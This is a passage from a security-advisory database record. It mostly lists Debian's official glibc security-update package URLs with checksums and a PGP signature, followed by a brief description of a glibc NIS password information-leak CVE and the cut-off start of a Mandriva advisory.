http://security.debian.org/pool/updates/main/g/glibc/glibc_2.7.orig.tar.gz\r\n Size/MD5 checksum: 15386750 8816fbab13a072c0ccef6640c9d20833\r\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.7-18lenny2.diff.gz\r\n Size/MD5 checksum: 746080 490b5454e410e7e6d173f35ed6d12068\r\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.7-18lenny2.dsc\r\n Size/MD5 checksum: 2564 348520fae28f63a32cfe8a6dc520231c\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/locales_2.7-18lenny2_all.deb\r\n Size/MD5 checksum: 4489926 58c7260aea726ee23a0e50d84595b540\r\n http://security.debian.org/pool/updates/main/g/glibc/glibc-doc_2.7-18lenny2_all.deb\r\n Size/MD5 checksum: 1628986 e785ce5ce122129805c5a90757970061\r\n http://security.debian.org/pool/updates/main/g/glibc/glibc-source_2.7-18lenny2_all.deb\r\n Size/MD5 checksum: 16005994 704856f12c5c9c43a8d5dd904af45b03\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dbg_2.7-18lenny2_alpha.deb\r\n Size/MD5 checksum: 5703992 1e28928fc815db99243932aea5d59268\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-pic_2.7-18lenny2_alpha.deb\r\n Size/MD5 checksum: 1768052 e3d30a9c3bbcb2368a4d9f735753818f\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-prof_2.7-18lenny2_alpha.deb\r\n Size/MD5 checksum: 2491854 b11ea9cbf797baa2685972298991e621\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_alpha.udeb\r\n Size/MD5 checksum: 18210 8808bde93a15babf4dd2d7aef0c636fa\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-udeb_2.7-18lenny2_alpha.udeb\r\n Size/MD5 checksum: 1265288 b5a093c6f640e12ecd256093499aec96\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_alpha.udeb\r\n Size/MD5 checksum: 10602 d11a1e2f9635d89ebe9959179ac0d535\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dev_2.7-18lenny2_alpha.deb\r\n Size/MD5 checksum: 3021266 080f48c5d5194aaefcbe9a815bf7e5c4\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_alpha.deb\r\n Size/MD5 checksum: 177244 cbe47153322beb5200ae523fb626d887\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1_2.7-18lenny2_alpha.deb\r\n Size/MD5 checksum: 5073386 3f9fa22d43cc24bb9217a6a429df0123\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-alphaev67_2.7-18lenny2_alpha.deb\r\n Size/MD5 checksum: 1619356 08b8a38ed95c2a0bf262b96613b92e8c\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_alpha.deb\r\n Size/MD5 checksum: 2601134 4f4b91cf366e2460b7687805756852fd\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_amd64.deb\r\n Size/MD5 checksum: 4943528 3e346b14fa2b9c94831bbc6c55ad0a9c\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_amd64.deb\r\n Size/MD5 checksum: 2500286 84ac8cf67157116099b9d69e2204938e\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-i386_2.7-18lenny2_amd64.deb\r\n Size/MD5 checksum: 3770620 3f1fc4d0314277fd1280628165d1b51f\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_amd64.deb\r\n Size/MD5 checksum: 1930498 6b4d7b8770f5bb3f92c91b8d51cfdd0a\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_amd64.udeb\r\n Size/MD5 checksum: 9424 970ad8c9008aa3bec774e43998dd67be\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_amd64.deb\r\n Size/MD5 checksum: 2817198 163b74300875d0be87c31ac66fbc5680\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_amd64.deb\r\n Size/MD5 checksum: 175180 b36bdf7656d0dd59cd388aa2b8851af2\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_amd64.udeb\r\n Size/MD5 checksum: 18312 c7138b8d033137c69b67287f460850de\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_amd64.udeb\r\n Size/MD5 checksum: 1107426 f27f61c75477eb9d8173c99dd7e508aa\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_amd64.deb\r\n Size/MD5 checksum: 5325274 47407046998843dd3f01c04710f7350e\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_amd64.deb\r\n Size/MD5 checksum: 1466462 60a0df28964b34b9b500ae26e258add5\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-i386_2.7-18lenny2_amd64.deb\r\n Size/MD5 checksum: 1459344 b0055d1d44deaaeb44c15ff5a0c51bb4\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_arm.deb\r\n Size/MD5 checksum: 2756622 e1c12d28cfd7f3683fe909ec33a0b66e\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_arm.deb\r\n Size/MD5 checksum: 5074250 cf85932be43b8776d3fd2d589eaaeb98\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_arm.deb\r\n Size/MD5 checksum: 4808312 8e11a8611586b9ec9bce864da8335366\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_arm.deb\r\n Size/MD5 checksum: 171722 4f5512c87e1df5dca971620134b23d45\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_arm.deb\r\n Size/MD5 checksum: 1778662 6cf4752aaf08ad6de2f9698878a707fe\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_arm.udeb\r\n Size/MD5 checksum: 14572 d6a4e6a0c0c44f655b737e47021dcda3\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_arm.deb\r\n Size/MD5 checksum: 1322990 98ebb1d8a74dc0b3464f05f6cbab5517\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_arm.udeb\r\n Size/MD5 checksum: 8414 902cdd777e422bc3735e2f7587aca2e0\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_arm.deb\r\n Size/MD5 checksum: 2323068 c8b65b89b6f87d269bb5c3e1023d4b4a\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_arm.udeb\r\n Size/MD5 checksum: 1026906 011e1ab66503227f16e320fda5d3e447\r\n\r\narmel architecture (ARM EABI)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_armel.deb\r\n Size/MD5 checksum: 2708680 58315aefbbc51c938d019fb3abc0d94b\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_armel.deb\r\n Size/MD5 checksum: 5115280 f8024499b92402b2d02e706d1ce1c151\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_armel.deb\r\n Size/MD5 checksum: 1894458 7b03b0ef484839f75d16d1751c5c57c3\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_armel.deb\r\n Size/MD5 checksum: 4868310 c129c2d0d56ed558348681af351c817d\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_armel.udeb\r\n Size/MD5 checksum: 8162 78685a7f84495a547a25eb0201360ebb\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_armel.deb\r\n Size/MD5 checksum: 171160 2ad73e2817c7791aba47ad906f7ec331\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_armel.udeb\r\n Size/MD5 checksum: 14556 fea4a3f52fc8b757a23122810369b200\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_armel.deb\r\n Size/MD5 checksum: 2433206 79e93a7a12bd77bb31b9df502875b891\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_armel.deb\r\n Size/MD5 checksum: 1394360 e5ca11beddb701d400646475c9ceb3ff\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_armel.udeb\r\n Size/MD5 checksum: 1085008 e6b65afadcc6390b5ef2b68db9125c12\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_hppa.deb\r\n Size/MD5 checksum: 2486110 7854a6b13311afef62e03049e6a3dbab\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_hppa.deb\r\n Size/MD5 checksum: 2873236 ce20efc1253b972f3410e4ff5bfb0423\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_hppa.deb\r\n Size/MD5 checksum: 5117228 d59fcc88f6f56c26d1e03f1c4ec5e68d\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_hppa.deb\r\n Size/MD5 checksum: 179292 f7f1e4f361bbb646c3919bdaf4b4f3af\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_hppa.udeb\r\n Size/MD5 checksum: 1121310 12070cf5b91e96dd8cc3eef9edc15e2c\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_hppa.udeb\r\n Size/MD5 checksum: 18532 9a2837c889118e26e5445031ec9b547c\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_hppa.deb\r\n Size/MD5 checksum: 1471786 72cb70fb13887000721b0a227dd27e68\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_hppa.udeb\r\n Size/MD5 checksum: 9746 2fe4879a6c8df0581e0cf39f48d7df64\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_hppa.deb\r\n Size/MD5 checksum: 5944866 3d54e0a015ec1d110365b631cec11ba7\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_hppa.deb\r\n Size/MD5 checksum: 1957758 9549e5a1110fce44475163140d6beff0\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_i386.deb\r\n Size/MD5 checksum: 1438844 8b725a142c5b41f0a1e0b04126705396\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_i386.deb\r\n Size/MD5 checksum: 2609544 9208c479b2848947c465b9d95ae2a6b3\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-i686_2.7-18lenny2_i386.deb\r\n Size/MD5 checksum: 1270768 e3a08867e7fbbc94f4bce24f03e9fdaf\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-amd64_2.7-18lenny2_i386.deb\r\n Size/MD5 checksum: 2012298 7b138a3e488296f5bf119953e3ba8bdd\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_i386.udeb\r\n Size/MD5 checksum: 822696 b341db54cccebd1c1361bfe82bc5a51a\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_i386.deb\r\n Size/MD5 checksum: 171868 b65e22f6b508d2220e9a342c64cb396b\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_i386.deb\r\n Size/MD5 checksum: 3388434 76ee9a2cff02f23d2f9dba562d220e8c\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_i386.udeb\r\n Size/MD5 checksum: 15434 0bc4bd1ac488ecf431a2b4b90390b9c6\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_i386.deb\r\n Size/MD5 checksum: 1154848 3dd9ef36198b752c1d5767e480088be7\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_i386.udeb\r\n Size/MD5 checksum: 8686 0c5cc05611daecd9b9af17a76ca4cd46\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_i386.deb\r\n Size/MD5 checksum: 5229412 5ba20fc70b4a0643db07780480575193\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_i386.deb\r\n Size/MD5 checksum: 4555042 77db7003bd2aba9fee8a7609e6829a35\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-xen_2.7-18lenny2_i386.deb\r\n Size/MD5 checksum: 1274546 b2d3d16f1c5fa5150db2003a000a8564\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-amd64_2.7-18lenny2_i386.deb\r\n Size/MD5 checksum: 4191796 519c08c149029bf988045a45b74ba1c4\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dbg_2.7-18lenny2_ia64.deb\r\n Size/MD5 checksum: 6261652 06e88c0da93fd7dab0829847a0f94deb\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_ia64.udeb\r\n Size/MD5 checksum: 22610 7fe0c2d35af30d4eec8d0176d65c1e51\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-prof_2.7-18lenny2_ia64.deb\r\n Size/MD5 checksum: 2691134 eb2fd2d4fc61fa7c237f32b379791d2f\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_ia64.deb\r\n Size/MD5 checksum: 197792 63b2679123616dce20c69f6579255958\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1_2.7-18lenny2_ia64.deb\r\n Size/MD5 checksum: 5615338 75d10e4f9e5bd92f4c7089f810b25d20\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_ia64.deb\r\n Size/MD5 checksum: 2605826 fff74128c928247980ff44cedcfbd120\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_ia64.udeb\r\n Size/MD5 checksum: 12942 eb26ffb3b5c56da8e92ba2b764be25a3\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-udeb_2.7-18lenny2_ia64.udeb\r\n Size/MD5 checksum: 1382410 4bdef86179309a310b727db9bee1c1cd\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-pic_2.7-18lenny2_ia64.deb\r\n Size/MD5 checksum: 1743264 6916eb62e98cdefa6eeb94283d78e9a8\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dev_2.7-18lenny2_ia64.deb\r\n Size/MD5 checksum: 3229900 47564364622287000f2028b532d85274\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mips64_2.7-18lenny2_mips.deb\r\n Size/MD5 checksum: 2501772 a9c994c2a6d2d8859f77103d7293cfbc\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mips64_2.7-18lenny2_mips.deb\r\n Size/MD5 checksum: 4345656 fbfa2ed8539cbea8c1d981a9cd96222f\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_mips.deb\r\n Size/MD5 checksum: 4959034 1a477fa61bc6b3f96869bf0838fda506\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_mips.deb\r\n Size/MD5 checksum: 5620066 0fd560b86bb369d07dbc2965ba325944\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_mips.deb\r\n Size/MD5 checksum: 172290 cf2d29e7e6faaeb1491abf86a0b64fdf\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mipsn32_2.7-18lenny2_mips.deb\r\n Size/MD5 checksum: 9231240 2d06878bb84a3374beffb79127034545\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_mips.deb\r\n Size/MD5 checksum: 2820678 8776ba861436c437aa136a1eddfe2dc4\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_mips.udeb\r\n Size/MD5 checksum: 8898 85ecef4337104110ded8585bda514cc1\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mipsn32_2.7-18lenny2_mips.deb\r\n Size/MD5 checksum: 2359702 40a18b8d89e8c01815ec5dfeae53eb52\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_mips.udeb\r\n Size/MD5 checksum: 15266 f66760387c706f0103f2ea247d6fcffc\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_mips.udeb\r\n Size/MD5 checksum: 1074188 0b9ce8713a1c6a17ce143f9fffee0a2f\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_mips.deb\r\n Size/MD5 checksum: 1496538 1d86b7a69d985b336e2d58576254a42b\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_mips.deb\r\n Size/MD5 checksum: 2633674 4f5a4773acb2111122d38aebf3439a3c\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_mips.deb\r\n Size/MD5 checksum: 2083630 aaca1a0ee1f7a2b30603b6fac62dbed3\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mips64_2.7-18lenny2_mipsel.deb\r\n Size/MD5 checksum: 2463852 e5b0165885f705f17b820f399425e825\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mipsn32_2.7-18lenny2_mipsel.deb\r\n Size/MD5 checksum: 2339670 13d9a03a536d5f2f0c22dcd6239fabbe\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_mipsel.deb\r\n Size/MD5 checksum: 2615826 e29ffa82388552659e0acc5108f6c9fe\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_mipsel.udeb\r\n Size/MD5 checksum: 15348 ecc6d361c89ddcd3cca7290f089ba293\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mips64_2.7-18lenny2_mipsel.deb\r\n Size/MD5 checksum: 4126610 11fc76ee2fd0366d811e1e55d55918ff\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_mipsel.deb\r\n Size/MD5 checksum: 5539956 1d663ec97755153e6aee1ddfe1e324bd\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mipsn32_2.7-18lenny2_mipsel.deb\r\n Size/MD5 checksum: 8466102 789770a4922b0147ac156e9e507bb2d3\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_mipsel.deb\r\n Size/MD5 checksum: 172792 d689fe228a3b099a7a0ebebb72fb056b\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_mipsel.deb\r\n Size/MD5 checksum: 4738338 e528dc94e19c75c8fa6351208539d0dd\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_mipsel.deb\r\n Size/MD5 checksum: 2070860 e3b560a426a6f75415036f2fddf2d860\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_mipsel.deb\r\n Size/MD5 checksum: 1493698 37245b6bf1a164ddce55249f5b2355e7\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_mipsel.udeb\r\n Size/MD5 checksum: 8942 081da2d0324d7b98485372886a449ec2\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_mipsel.deb\r\n Size/MD5 checksum: 2613302 2da5860103233044aef5d5ed595e13ad\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_mipsel.udeb\r\n Size/MD5 checksum: 1070786 715579ba7139c2a177196c98520b1d77\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_powerpc.deb\r\n Size/MD5 checksum: 6327312 4e82d32cc64aeca28c04268fd9689759\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_powerpc.udeb\r\n Size/MD5 checksum: 1223180 cbe7be52720f663d49a338abbce598d1\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_powerpc.deb\r\n Size/MD5 checksum: 2807238 57156dfd9423e1f7fd18707d96d17f97\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_powerpc.deb\r\n Size/MD5 checksum: 2258072 3141c4be19b9516dd497e4b230943073\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_powerpc.udeb\r\n Size/MD5 checksum: 16840 6a855c5a27b897dc5d0a5b9538bb6112\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_powerpc.deb\r\n Size/MD5 checksum: 5187586 e781552852cd5bef6573b6ac79da6cd2\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_powerpc.deb\r\n Size/MD5 checksum: 1597596 3848878797e1357f9801641527407072\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-ppc64_2.7-18lenny2_powerpc.deb\r\n Size/MD5 checksum: 4482256 9ef7584df9c460e79bd55087b8afbacb\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_powerpc.deb\r\n Size/MD5 checksum: 2731956 53fa26eb5a7257fea505c0cfbd0bc27b\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_powerpc.udeb\r\n Size/MD5 checksum: 9410 7e569e9cd33808010ee9cafc3606fc32\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_powerpc.deb\r\n Size/MD5 checksum: 174318 4d0f0c87cbc49b6d59613810e7e3bd02\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-ppc64_2.7-18lenny2_powerpc.deb\r\n Size/MD5 checksum: 2412278 951695c8d70561915752d0e108ddc095\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_s390.udeb\r\n Size/MD5 checksum: 1218440 eff74770d12052a2bf26f4e7c0b6ce34\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_s390.udeb\r\n Size/MD5 checksum: 9036 a15bdabe36b94e53962e476d6e18b519\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_s390.deb\r\n Size/MD5 checksum: 2196564 453a074e5b5e9665bb813c294dfbf4dd\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_s390.deb\r\n Size/MD5 checksum: 5981776 8bfa7838e842921d6c5c259078798d2c\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_s390.deb\r\n Size/MD5 checksum: 176934 7124f9f9ff2d66cdbbdd3bdc5e6ed992\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-s390x_2.7-18lenny2_s390.deb\r\n Size/MD5 checksum: 2367030 418bce5568280066783091c0c309eda2\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-s390x_2.7-18lenny2_s390.deb\r\n Size/MD5 checksum: 4388378 31232cf4d26d726dc5b9de329c8d0110\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_s390.deb\r\n Size/MD5 checksum: 1535084 17c12e5b45bb66e2c9bd6d7beeb8eb05\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_s390.deb\r\n Size/MD5 checksum: 2723494 5b7a3162feff0b5ad3ef2baa047bb50e\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_s390.udeb\r\n Size/MD5 checksum: 16200 343189b4f868ac4d3ad23f8138688804\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_s390.deb\r\n Size/MD5 checksum: 5141992 ae8b844ab9c7aabde154ceb5e72fc5e3\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_s390.deb\r\n Size/MD5 checksum: 2717816 7e4a2e9f7be65e0ee1e330fa48704eb9\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny2_sparc.deb\r\n Size/MD5 checksum: 1611578 37d781b03d4ce123fe7c8c103f091a42\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny2_sparc.deb\r\n Size/MD5 checksum: 5139444 92f997c7daaaf71153d8a1e8d21f7314\r\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny2_sparc.deb\r\n Size/MD5 checksum: 2763278 7080ac750fb3d6a906b89d2eddc78092\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-sparc64_2.7-18lenny2_sparc.deb\r\n Size/MD5 checksum: 4454740 51f6317b56e0a5ff575aadbc5f2bb77b\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny2_sparc.udeb\r\n Size/MD5 checksum: 1250048 860e14abe61ba8c10362dc86c87ee15e\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny2_sparc.udeb\r\n Size/MD5 checksum: 8322 fde787c6133156005b9fa32e27a1f2db\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-sparcv9b_2.7-18lenny2_sparc.deb\r\n Size/MD5 checksum: 1753772 0da91632598f26a946c68edcc146d3f2\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny2_sparc.deb\r\n Size/MD5 checksum: 2824922 14294cead6b6eef9101cad16cc3b88db\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny2_sparc.deb\r\n Size/MD5 checksum: 2300946 243cb9e68528dfa6687663ae0d71607d\r\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny2_sparc.deb\r\n Size/MD5 checksum: 170526 0c6f87544f48534b4f4101290a7c7c3a\r\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny2_sparc.udeb\r\n Size/MD5 checksum: 15038 60c07ae011350357a6162218a3d70738\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny2_sparc.deb\r\n Size/MD5 checksum: 6799358 14d7440321a1c8cd941618fa82ef0d53\r\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-sparc64_2.7-18lenny2_sparc.deb\r\n Size/MD5 checksum: 2589060 0b0215c95cf737680551eedaecb3cb06\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAktWMjcACgkQ62zWxYk/rQfjtACglnOO7ZVyXeofiXK1HBQQEboe\r\nuPIAn08MwJSa5ImltY5pmV/g9jSTniI3\r\n=hoKv\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-01-20T00:00:00", "published": "2010-01-20T00:00:00", "id": "SECURITYVULNS:DOC:23077", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23077", "title": "[SECURITY] [DSA 1973-1] New glibc packages fix information disclosure", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-0015"], "description": "Records from passwd.adjunct.byname map are added to passwd map leading to crypted NIS password disclosure.", "edition": 1, "modified": "2010-01-20T00:00:00", "published": "2010-01-20T00:00:00", "id": "SECURITYVULNS:VULN:10537", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10537", "title": "glibc getpwname information leak", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2010-2898", "CVE-2010-0296", "CVE-2011-2483", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2010-3847", "CVE-2011-0536", "CVE-2011-1089"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2011:178\r\n http://www.mandriva.com/security/\r\n 